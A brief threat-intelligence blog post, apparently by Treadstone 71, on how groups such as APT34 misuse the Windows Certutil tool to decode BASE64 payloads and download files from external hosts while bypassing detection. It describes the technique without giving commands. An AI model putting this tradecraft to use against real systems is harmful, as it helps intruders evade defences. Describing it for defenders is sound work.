Certutil module #APT34

Read Time:46 Second

#Certutil_Concept
Many attacks in recent years, such as the #APT34, have used the Certutil module, due to the fact that Certutil has two very attractive features for hackers

Certutil is a module related to installing customized Certificates required on Windows operating systems designed by Microsoft and installed by default on Windows operating systems.

But the two features of this module are that, with Certutil we can lower the BASE64 encoding values, so using Certutil instead of a handwritten decoder in Payload hacker can be a very good mode, the second is that we can use this The TextPlain file module can be downloaded and saved for us via External DNS

The purpose of this post was not just to describe CertUtil, but rather to focus on the default services of Windows operating systems under the pretext of this module to provide creative solutions to the bypassing of Detection mechanisms.

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %

Author

  • @Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence

Previous post Ministry of Health spokesman Jahanpour not transparent about the Corona outbreak -Tapandegan
Next post Latest Iranian propaganda-Covid-19 US biowarfare
%d bloggers like this: